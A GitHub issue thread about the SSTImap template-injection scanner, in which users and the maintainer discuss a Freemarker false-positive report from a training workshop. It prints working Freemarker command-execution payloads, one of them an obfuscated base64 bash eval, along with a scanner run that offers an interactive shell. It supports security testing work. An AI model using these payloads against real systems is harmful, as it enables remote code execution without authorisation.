
SSTImap should test simple payload, otherwise may return false positive result #30

Open
alasalamont opened this issue Dec 26, 2023 · 6 comments
Labels
awaits confirmation The issue is supposed to be resolved, but requires some testing delayed The issue will be fixed with a big update later

Comments

@alasalamont commented Dec 26, 2023

Hi brother,
I tested SSTImap on this workshop, at 25_template_freemarker:

https://gosecure.github.io/template-injection-workshop/

When I use a simple payload, it works:

<#assign ex="freemarker.template.utility.Execute"?new()>${ ex("id")}

But when the tool uses its own payload, it does not work:

${7670795914?c}<#assign ex="freemarker.template.utility.Execute"?new()>${ ex("bash -c {eval,$({tr,/+,_-}<<<ZWNobyBhMA==|{base64,--decode})}") }${7841412055?c}

The site returns:

Template blocked: Cannot run program "bash": error=2, No such file or directory ---- FTL stack trace ("~" means nesting-related): - Failed at: ${ex("bash -c {eval,$({tr,/+,_-}\l\l\... [in template "tpl" at line 1, column 72] ----

Because of this, the tool also returns a false positive result:

```
┌──(root㉿kali)-[/home/kali/Desktop/SSTImap]
└─# python3 sstimap.py -u "http://localhost:8025/admin/edit_page/1" -d "_csrf=ddcf50d0-b5a0-43f5-95dd-351495abc31b&title=Welcome+Page&templateCode=*&action=test" -C "JSESSIONID=182F5156C0D7E1B0A0E72D87D3D4F845" --proxy http://localhost:8080 -l 5 -e Freemarker

[*] Version: 1.1.4
[*] Author: @vladko312
[*] Based on Tplmap
[!] LEGAL DISCLAIMER: Usage of SSTImap for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] Loaded plugins by categories: languages: 5; legacy_engines: 1; engines: 16

[*] Scanning url: http://localhost:8025/admin/edit_page/1
[*] Testing if POST parameter 'templateCode' is injectable
[*] Freemarker plugin is testing rendering with tag '*'
[+] Freemarker plugin has confirmed injection with tag '*'
[+] SSTImap identified the following injection point:

  POST parameter: templateCode
  Engine: Freemarker
  Injection: *
  Context: text
  OS: undetected
  Technique: render
  Capabilities:

    Shell command execution: no
    Bind and reverse shell: no
    File write: no
    File read: no
    Code evaluation: no

[+] Rerun SSTImap providing one of the following options:
    --tpl-shell                  Prompt for an interactive shell on the template engine.
    --tpl-cmd                    Inject code in the template engine.
```
alasalamont changed the title from "SSTImap should test simple basic, otherwise may return false positive result" to "SSTImap should test simple payload, otherwise may return false positive result" on Dec 26, 2023

@mrdragonblack commented

Same problem, but the problem is the web does not use a template engine, or maybe it is just a junk HTTP packet. Maybe errors from the web like 5xx or a WAF can cause a false positive, or the target web is not vulnerable to SSTI, just junk HTTP.

@vladko312 (Owner) commented

@alasalamont Why is your case a false positive? SSTImap correctly identified the template injection as rendered Freemarker using another payload. It was unable to run OS commands, as it tried using bash, but you can still inject template code to try different payloads. This works as intended, as bypassing a WAF is hard to automate.

I will work on improving the payload system though, as bash is not always present on the target.
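To make concrete how the two outcomes above differ (rendering confirmed versus command execution not confirmed), here is an added Python example, written for this thread and not SSTImap's own code, that classifies a response to a marker-wrapped probe like `${N?c}...${M?c}` as rendered, engine error, reflected verbatim, or unknown. The sample responses are constructed, and the "FreeMarker template error" heading is assumed as an alternative error marker.

```python
import re
from typing import Optional

# Constructed sample data, not from a real target. The two marker numbers are
# the ones visible in the issue's Freemarker payload.
MARK_A, MARK_B = "7670795914", "7841412055"

def probe(mark_a: str, mark_b: str, inner: str = "") -> str:
    """Build a marker-wrapped Freemarker probe: ${A?c}<inner>${B?c}.
    With an empty inner part this is the plain render test."""
    return "${" + mark_a + "?c}" + inner + "${" + mark_b + "?c}"

def classify(body: str, mark_a: str = MARK_A, mark_b: str = MARK_B) -> str:
    """Interpret one response to a marker-wrapped probe.

    reflected     the probe came back verbatim: the input was not rendered
    engine-error  the engine raised an FTL error instead of output: the input
                  was rendered, but this particular payload was rejected
    rendered      both markers came back as bare numbers (the engine evaluated
                  ${N?c}); whatever sits between them is the inner output
    unknown       anything else (WAF block page, 5xx, unrelated content)
    """
    if ("${" + mark_a + "?c}") in body:
        return "reflected"
    # "FTL stack trace" is the string in the issue; the second heading is assumed.
    if re.search(r"FTL stack trace|FreeMarker template error", body):
        return "engine-error"
    if mark_a in body and mark_b in body and body.index(mark_a) < body.index(mark_b):
        return "rendered"
    return "unknown"

def captured_output(body: str, mark_a: str = MARK_A, mark_b: str = MARK_B) -> Optional[str]:
    """Text between the two rendered markers, or None if the response was not a
    clean render. An empty string means the engine rendered the template but the
    inner part produced nothing, which maps to 'Shell command execution: no'."""
    if classify(body, mark_a, mark_b) != "rendered":
        return None
    start = body.index(mark_a) + len(mark_a)
    end = body.index(mark_b, start)
    return body[start:end]

# Constructed responses, modelled on what the issue describes.
RENDER_TEST_OK = "<h1>Welcome Page</h1>" + MARK_A + MARK_B + "</body>"
NO_BASH = ('Template blocked: Cannot run program "bash": error=2, No such file '
           'or directory ---- FTL stack trace ("~" means nesting-related): ...')
VERBATIM = "<h1>Welcome Page</h1>" + probe(MARK_A, MARK_B) + "</body>"
WAF_PAGE = "<html><title>Request blocked</title>403</html>"
```

Applied to the thread's case, the render test classifies as "rendered" (injection confirmed) while the bash payload classifies as "engine-error", so the tool reports the injection point but no command execution capability.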

@vladko312 (Owner) commented

@mrdragonblack The problem you described is most likely caused by blind detection with a small delay. Increase the delay or disable blind detection.

vladko312 added the labels "in progress: The issue would be fixed in the next minor version" and "awaits confirmation: The issue is supposed to be resolved, but requires some testing" on Dec 28, 2023

@alasalamont (Author) commented

> @alasalamont Why is your case a false positive? SSTImap correctly identified the template injection as rendered Freemarker using another payload. It was unable to run OS commands, as it tried using bash, but you can still inject template code to try different payloads. This works as intended, as bypassing a WAF is hard to automate.
>
> I will work on improving the payload system though, as bash is not always present on the target.

Yup, you are correct. I suggest adding some more payloads to test, to double-check. Like in this case, the system has no bash ^^

@vladko312 (Owner) commented

> I suggest adding some more payloads to test, to double-check. Like in this case, the system has no bash

I will do something about that, making more payload variations once the language is detected.

@vladko312 (Owner) commented

Blind false positives should be fixed in 1.2.0.
@mrdragonblack, can you verify?

As for payloads with bash, this will come in later versions.

vladko312 added the label "delayed: The issue will be fixed with a big update later" and removed "in progress: The issue would be fixed in the next minor version" on Jan 6, 2024